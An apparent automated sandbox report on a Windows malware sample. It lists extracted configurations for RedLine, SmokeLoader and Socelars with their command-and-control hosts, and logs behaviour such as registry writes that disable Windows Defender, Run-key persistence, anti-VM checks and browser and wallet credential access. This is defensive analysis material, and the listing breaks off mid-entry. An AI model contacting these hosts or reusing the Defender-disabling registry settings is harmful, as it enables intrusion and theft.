Resubmissions
10-11-2021 14:52
211110-r84p8ahcb5 1010-11-2021 14:46
211110-r5g22seddm 1010-11-2021 14:39
211110-r1a3yaedcq 610-11-2021 14:22
211110-rptqxahbf9 10Analysis
-
max time kernel
601s -
max time network
615s -
platform
windows11_x64 -
resource
win11 -
submitted
10-11-2021 14:52
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-ja-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-de-20211104
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral5
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Malware Config
Extracted
socelars
http://www.hhgenice.top/
Extracted
redline
tatreriash.xyz:80
Extracted
redline
1011h
charirelay.xyz:80
Extracted
smokeloader
2020
http://nalirou70.top/
http://xacokuo80.top/
Extracted
metasploit
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/1936-263-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral4/memory/2516-307-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe2fALarXMuVsK8Kr6mdnCh8QA.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4136 created 1816 4136 WerFault.exe Conhost.exe PID 3164 created 1772 3164 WerFault.exe qzCQ9wqiLMPlyVDD8ZFRIOqV.exe PID 2172 created 2924 2172 WerFault.exe yvhLYbbmmCfOlUgWABtSMRDf.exe PID 3264 created 2060 3264 WerFault.exe QO8u8gtb7uObQDhzvhRv4igC.exe PID 3672 created 3152 3672 powershell.exe Q3pIIimUP0tQUT95n2NUUh2j.exe PID 4272 created 2208 4272 WerFault.exe ZNI8bKplPziC7FLEsLZFyzD1.exe PID 3420 created 428 3420 WerFault.exe schtasks.exe PID 2660 created 5100 2660 WerFault.exe FJEIGTwa1q3oVzOT5c3cc37b.exe PID 4448 created 836 4448 WerFault.exe QyJbYA0cr9LsSfWa6gVbLrL2.exe PID 1448 created 4056 1448 WerFault.exe netsh.exe PID 3968 created 2668 3968 2fALarXMuVsK8Kr6mdnCh8QA.exe 7LqbaIUgDyMj8g6M1AWB5VC1.exe PID 5624 created 784 5624 WerFault.exe wb9Z4W6sHdzd2qgFhpqZc9DO.exe PID 5940 created 2796 5940 WerFault.exe V3hMvyVpqo4RRJQ0L41za8qq.exe PID 6004 created 2084 6004 WerFault.exe KxSo365gOHwonWD80HicVHZz.exe PID 6008 created 5032 6008 WerFault.exe D97A.exe PID 5816 created 5048 5816 WerFault.exe 1657.exe PID 3036 created 3984 3036 WerFault.exe Conhost.exe PID 5148 created 5792 5148 WerFault.exe 7BAA.exe PID 1252 created 2448 1252 WerFault.exe 8EA7.exe PID 3000 created 6336 3000 WerFault.exe autosubplayer.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 4880 created 5152 4880 svchost.exe AdvancedRun.exe PID 4880 created 5152 4880 svchost.exe AdvancedRun.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Processes:
resource yara_rule behavioral4/memory/428-296-0x0000000000400000-0x00000000007A9000-memory.dmp redline -
Arkei Stealer Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/1772-265-0x0000000000690000-0x00000000006B1000-memory.dmp family_arkei -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/2208-321-0x00000000022A0000-0x0000000002375000-memory.dmp family_vidar -
Blocklisted process makes network request 42 IoCs
Processes:
powershell.exeMsiExec.exeflow pid process 254 5600 powershell.exe 293 5600 powershell.exe 442 5504 MsiExec.exe 443 5504 MsiExec.exe 444 5504 MsiExec.exe 446 5504 MsiExec.exe 447 5504 MsiExec.exe 449 5504 MsiExec.exe 451 5504 MsiExec.exe 453 5504 MsiExec.exe 456 5504 MsiExec.exe 457 5504 MsiExec.exe 458 5504 MsiExec.exe 461 5504 MsiExec.exe 462 5504 MsiExec.exe 464 5504 MsiExec.exe 465 5504 MsiExec.exe 467 5504 MsiExec.exe 468 5504 MsiExec.exe 469 5504 MsiExec.exe 472 5504 MsiExec.exe 473 5504 MsiExec.exe 475 5504 MsiExec.exe 477 5504 MsiExec.exe 478 5504 MsiExec.exe 479 5504 MsiExec.exe 481 5504 MsiExec.exe 483 5504 MsiExec.exe 484 5504 MsiExec.exe 486 5504 MsiExec.exe 487 5504 MsiExec.exe 488 5504 MsiExec.exe 490 5504 MsiExec.exe 491 5504 MsiExec.exe 492 5504 MsiExec.exe 494 5504 MsiExec.exe 495 5504 MsiExec.exe 496 5504 MsiExec.exe 498 5504 MsiExec.exe 499 5504 MsiExec.exe 501 5504 MsiExec.exe 503 5504 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
DYbALA.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
Ouvwjy_89uDNL70EEFA2qHL5.exeqzCQ9wqiLMPlyVDD8ZFRIOqV.exeFJEIGTwa1q3oVzOT5c3cc37b.exeljPNKhG9hJ6PhlrgtRr5cIFm.exeamD4i2PTHWZxAeh6OYXGhkWJ.exeEruXS7l1FPOtK_uzRDbujkGd.exeQO8u8gtb7uObQDhzvhRv4igC.exe0d6h2XMXnU08oZQ4umyeKupB.exe7LqbaIUgDyMj8g6M1AWB5VC1.exeyvhLYbbmmCfOlUgWABtSMRDf.exeenkrj5IxvWlIKv5oouKejJ5B.exe0yNgvBPcRWcsyU3553kqC43i.exeNI0XHntA_fwdq3dAeQwg1aCs.exeQ3pIIimUP0tQUT95n2NUUh2j.exeWPm21lmsXt4hSyDK5j7tjJO9.exe04L8wfx8yzTV7egq7doWxMGm.exe40uba9ALppp3uZizoSponZcR.exeZNI8bKplPziC7FLEsLZFyzD1.exeaBgveQvYXSWQgZEuLsY6B7w_.exe3gsTxWt53bh_Ip3JWz9BDOLx.exeFL7nNGIgUpO6QiLsiNqM69Ra.exeQyJbYA0cr9LsSfWa6gVbLrL2.exeBbcTQM9kCz2wSCp4zL3cjKtX.executm3.exe3gsTxWt53bh_Ip3JWz9BDOLx.exeewmRSwZubmvS4cOEYuAWcqn3.exesvchost.exe2fALarXMuVsK8Kr6mdnCh8QA.exesetup.exewb9Z4W6sHdzd2qgFhpqZc9DO.exeV3hMvyVpqo4RRJQ0L41za8qq.exeKxSo365gOHwonWD80HicVHZz.exeyCYU6qOUstYnFfwx6lvQtxly.exezxNtqQzQWzlPqP0HPwIC8Sc1.exef3ESHOZX_yJCskhbBLnqpeMx.exe4f8fGuX7mGm7DDlW8H2XAO5T.exe4f8fGuX7mGm7DDlW8H2XAO5T.tmpCalculator.exeAA4A.exeAA4A.exeD97A.exeED9F.exeED9F.exe1657.execmd.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exe7BAA.exeCalculator.exeCalculator.exeCalculator.exeConhost.exeDYbALA.exe8EA7.exeA954.exeSHaexoshuvysho.exeSHytymuxejo.exepid process 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 1772 qzCQ9wqiLMPlyVDD8ZFRIOqV.exe 5100 FJEIGTwa1q3oVzOT5c3cc37b.exe 2296 ljPNKhG9hJ6PhlrgtRr5cIFm.exe 2004 amD4i2PTHWZxAeh6OYXGhkWJ.exe 1816 EruXS7l1FPOtK_uzRDbujkGd.exe 2060 QO8u8gtb7uObQDhzvhRv4igC.exe 2284 0d6h2XMXnU08oZQ4umyeKupB.exe 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe 2924 yvhLYbbmmCfOlUgWABtSMRDf.exe 1648 enkrj5IxvWlIKv5oouKejJ5B.exe 4836 0yNgvBPcRWcsyU3553kqC43i.exe 3656 NI0XHntA_fwdq3dAeQwg1aCs.exe 3152 Q3pIIimUP0tQUT95n2NUUh2j.exe 3416 WPm21lmsXt4hSyDK5j7tjJO9.exe 4056 04L8wfx8yzTV7egq7doWxMGm.exe 428 40uba9ALppp3uZizoSponZcR.exe 2208 ZNI8bKplPziC7FLEsLZFyzD1.exe 5056 aBgveQvYXSWQgZEuLsY6B7w_.exe 2628 3gsTxWt53bh_Ip3JWz9BDOLx.exe 3332 FL7nNGIgUpO6QiLsiNqM69Ra.exe 836 QyJbYA0cr9LsSfWa6gVbLrL2.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 4552 cutm3.exe 2148 3gsTxWt53bh_Ip3JWz9BDOLx.exe 1496 ewmRSwZubmvS4cOEYuAWcqn3.exe 492 svchost.exe 3968 2fALarXMuVsK8Kr6mdnCh8QA.exe 4972 setup.exe 784 wb9Z4W6sHdzd2qgFhpqZc9DO.exe 2796 V3hMvyVpqo4RRJQ0L41za8qq.exe 2084 KxSo365gOHwonWD80HicVHZz.exe 3168 yCYU6qOUstYnFfwx6lvQtxly.exe 3248 zxNtqQzQWzlPqP0HPwIC8Sc1.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 5380 4f8fGuX7mGm7DDlW8H2XAO5T.exe 5600 4f8fGuX7mGm7DDlW8H2XAO5T.tmp 5700 Calculator.exe 6084 AA4A.exe 5944 AA4A.exe 5032 D97A.exe 5564 ED9F.exe 3556 ED9F.exe 5048 1657.exe 5504 cmd.exe 2220 Calculator.exe 400 Calculator.exe 2564 Calculator.exe 5700 Calculator.exe 1440 Calculator.exe 5836 Calculator.exe 2292 Calculator.exe 5364 Calculator.exe 5792 7BAA.exe 2628 Calculator.exe 3752 Calculator.exe 1540 Calculator.exe 3984 Conhost.exe 6120 DYbALA.exe 5792 7BAA.exe 2448 8EA7.exe 6124 A954.exe 5160 SHaexoshuvysho.exe 4652 SHytymuxejo.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe vmprotect C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe vmprotect behavioral4/memory/1648-269-0x0000000140000000-0x0000000140FFB000-memory.dmp vmprotect C:\Windows\System\svchost.exe vmprotect C:\Windows\System\svchost.exe vmprotect -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
7BAA.exeljPNKhG9hJ6PhlrgtRr5cIFm.exe40uba9ALppp3uZizoSponZcR.exeWPm21lmsXt4hSyDK5j7tjJO9.exeamD4i2PTHWZxAeh6OYXGhkWJ.exeFL7nNGIgUpO6QiLsiNqM69Ra.exeQO8u8gtb7uObQDhzvhRv4igC.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7BAA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ljPNKhG9hJ6PhlrgtRr5cIFm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 40uba9ALppp3uZizoSponZcR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WPm21lmsXt4hSyDK5j7tjJO9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7BAA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amD4i2PTHWZxAeh6OYXGhkWJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FL7nNGIgUpO6QiLsiNqM69Ra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FL7nNGIgUpO6QiLsiNqM69Ra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QO8u8gtb7uObQDhzvhRv4igC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ljPNKhG9hJ6PhlrgtRr5cIFm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WPm21lmsXt4hSyDK5j7tjJO9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QO8u8gtb7uObQDhzvhRv4igC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amD4i2PTHWZxAeh6OYXGhkWJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 40uba9ALppp3uZizoSponZcR.exe -
Loads dropped DLL 64 IoCs
Processes:
BbcTQM9kCz2wSCp4zL3cjKtX.exesetup.exef3ESHOZX_yJCskhbBLnqpeMx.exe4f8fGuX7mGm7DDlW8H2XAO5T.tmpCalculator.exeregsvr32.execmd.exeCalculator.exeany.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exe7BAA.exeCalculator.exeCalculator.exeCalculator.exeinstaller.exepid process 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 5068 BbcTQM9kCz2wSCp4zL3cjKtX.exe 4972 setup.exe 4972 setup.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 5600 4f8fGuX7mGm7DDlW8H2XAO5T.tmp 5700 Calculator.exe 5700 Calculator.exe 5176 regsvr32.exe 4972 setup.exe 5504 cmd.exe 4972 setup.exe 4972 setup.exe 5504 cmd.exe 5504 cmd.exe 4972 setup.exe 5700 Calculator.exe 5700 Calculator.exe 2220 Calculator.exe 2220 Calculator.exe 5700 Calculator.exe 2220 Calculator.exe 5068 any.exe 5700 Calculator.exe 3956 f3ESHOZX_yJCskhbBLnqpeMx.exe 400 Calculator.exe 2564 Calculator.exe 5700 Calculator.exe 1440 Calculator.exe 5836 Calculator.exe 5836 Calculator.exe 5836 Calculator.exe 2292 Calculator.exe 2292 Calculator.exe 1440 Calculator.exe 2292 Calculator.exe 1440 Calculator.exe 5792 7BAA.exe 5792 7BAA.exe 5792 7BAA.exe 2628 Calculator.exe 2628 Calculator.exe 2628 Calculator.exe 2628 Calculator.exe 1440 Calculator.exe 3752 Calculator.exe 3752 Calculator.exe 3752 Calculator.exe 3752 Calculator.exe 1540 Calculator.exe 1540 Calculator.exe 1540 Calculator.exe 1540 Calculator.exe 2548 installer.exe 2548 installer.exe 2548 installer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\amD4i2PTHWZxAeh6OYXGhkWJ.exe themida C:\Users\Admin\Pictures\Adobe Films\ljPNKhG9hJ6PhlrgtRr5cIFm.exe themida C:\Users\Admin\Pictures\Adobe Films\WPm21lmsXt4hSyDK5j7tjJO9.exe themida C:\Users\Admin\Pictures\Adobe Films\FL7nNGIgUpO6QiLsiNqM69Ra.exe themida behavioral4/memory/2004-239-0x00000000004F0000-0x00000000004F1000-memory.dmp themida behavioral4/memory/2296-235-0x0000000000D60000-0x0000000000D61000-memory.dmp themida behavioral4/memory/3332-289-0x0000000000190000-0x0000000000191000-memory.dmp themida -
Processes:
B645.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths B645.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions B645.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\B645.exe = "0" B645.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" B645.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features B645.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" B645.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection B645.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" B645.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet B645.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" B645.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
DYbALA.exemsedge.exesetup.exeCalculator.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Cecyniwaevo.exe\"" DYbALA.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Calculator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" Calculator.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
zxNtqQzQWzlPqP0HPwIC8Sc1.exe7BAA.exeamD4i2PTHWZxAeh6OYXGhkWJ.exe40uba9ALppp3uZizoSponZcR.exeFL7nNGIgUpO6QiLsiNqM69Ra.exeNI0XHntA_fwdq3dAeQwg1aCs.exeQO8u8gtb7uObQDhzvhRv4igC.exeljPNKhG9hJ6PhlrgtRr5cIFm.exeWPm21lmsXt4hSyDK5j7tjJO9.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA zxNtqQzQWzlPqP0HPwIC8Sc1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7BAA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA amD4i2PTHWZxAeh6OYXGhkWJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 40uba9ALppp3uZizoSponZcR.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FL7nNGIgUpO6QiLsiNqM69Ra.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NI0XHntA_fwdq3dAeQwg1aCs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QO8u8gtb7uObQDhzvhRv4igC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ljPNKhG9hJ6PhlrgtRr5cIFm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WPm21lmsXt4hSyDK5j7tjJO9.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 184 api.db-ip.com 195 ipinfo.io 5 ipinfo.io 5 api.db-ip.com 30 ipinfo.io 65 ip-api.com 139 ipinfo.io 32 api.db-ip.com 65 ipinfo.io 150 api.db-ip.com 182 ipinfo.io 339 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
amD4i2PTHWZxAeh6OYXGhkWJ.exeljPNKhG9hJ6PhlrgtRr5cIFm.exeWPm21lmsXt4hSyDK5j7tjJO9.exeFL7nNGIgUpO6QiLsiNqM69Ra.exepid process 2004 amD4i2PTHWZxAeh6OYXGhkWJ.exe 2296 ljPNKhG9hJ6PhlrgtRr5cIFm.exe 3416 WPm21lmsXt4hSyDK5j7tjJO9.exe 3332 FL7nNGIgUpO6QiLsiNqM69Ra.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
QO8u8gtb7uObQDhzvhRv4igC.exe3gsTxWt53bh_Ip3JWz9BDOLx.exeschtasks.exeAA4A.exeED9F.exe7BAA.exeB645.exedescription pid process target process PID 2060 set thread context of 1936 2060 QO8u8gtb7uObQDhzvhRv4igC.exe AppLaunch.exe PID 2628 set thread context of 2148 2628 3gsTxWt53bh_Ip3JWz9BDOLx.exe 3gsTxWt53bh_Ip3JWz9BDOLx.exe PID 428 set thread context of 2516 428 schtasks.exe AppLaunch.exe PID 6084 set thread context of 5944 6084 AA4A.exe AA4A.exe PID 5564 set thread context of 3556 5564 ED9F.exe ED9F.exe PID 5792 set thread context of 5064 5792 7BAA.exe AppLaunch.exe PID 5264 set thread context of 2268 5264 B645.exe B645.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeDYbALA.exeaBgveQvYXSWQgZEuLsY6B7w_.exe0yNgvBPcRWcsyU3553kqC43i.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File created C:\Program Files\Windows Media Player\VCHGWOIJAU\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe aBgveQvYXSWQgZEuLsY6B7w_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File created C:\Program Files 